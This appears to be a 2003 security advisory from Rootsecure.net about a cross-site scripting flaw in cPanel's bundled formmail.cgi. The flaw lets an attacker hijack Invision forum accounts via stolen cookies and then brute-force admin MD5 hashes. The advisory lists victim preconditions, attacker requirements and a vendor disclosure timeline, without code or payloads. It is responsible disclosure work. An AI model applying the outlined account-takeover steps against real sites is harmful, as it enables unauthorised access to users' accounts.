discussion boards/forums (and other similarly coded applications) which are
located on hosting accounts set up using
version "5.3.0-RELEASE #117" and below (other versions have not been tested)
are vulnerable to standard
CSS (Cross site scripting) attacks due to poor filtering in Cpanels
Wright's popular formmail.cgi script. This same CSS problem
believed to be specifically for Matt Wright's formmail was posted to
Bugtraq on 11/02/03.
Rootsecure.net recently verified this attack
against a Cpanel running both a bundled version of Invision board 1.0.1 and
a custom installed 1.1a. It should be noted that this is no fault with Invisions
product, as with most other web applications cookies are assumed to be
private and unknown to outside parties. It is also difficult to
implement additional verification to prevent this attack being successful.
If successfully exploited, an attacker is able to have full control over
the users accounts, and if that user has moderator status so will the
attacker. At this point administrative access can not be gained due to
an additional separate session based authentication system on the admin
module. However if the attack was carried out against a user with
administrative access rights, the attacker may try brute forcing the users
MD5 hash (6 or less characters on a reasonable spec'ed machine will take an
hour or so, anything bigger and your looking it days) with a utility such as
Mitigating circumstances for the targeted user:
* Must have autologon enabled
* Has to visit a page set by the attacker (unless the
board has HTML enabled)
* Most likely must be using Internet Explorer 6.0 due to its lax processing
of Java Script code which does not adhere to standards.
* Must have Java Script turned on (configurations other than default have
not been tested)
Requirements for the attacker to implement the attack from scratch:
* An understanding of the HTTP protocol
* A server supporting a scripting language such as Perl
* Access to a LAN with knowledge of using a Port Sniffer such as ethereal
(for gathering raw HTTP traffic to use as a template for the attack)
Note: This report is intentionally a brief outline of the process used
by Rootsecure.net to gain authorised access to an account for which it did
not know the password. More details may be forthcoming depending on
the availability / implementation of patches for this issue.
Cpanel the vendor was informed about this issue on 21/02/03 by Rootsecure.net.
Soon after an email was received asking for specific details of the attack,
which were provided. Rootsecure.net now awaits a response as to its
query on a patch for it.
Update: Cpanel are having difficulties reproducing the issue,
Rootsecure.net is providing assistance.
Thanks to Epiphany of
port7alliance.com for his assistance.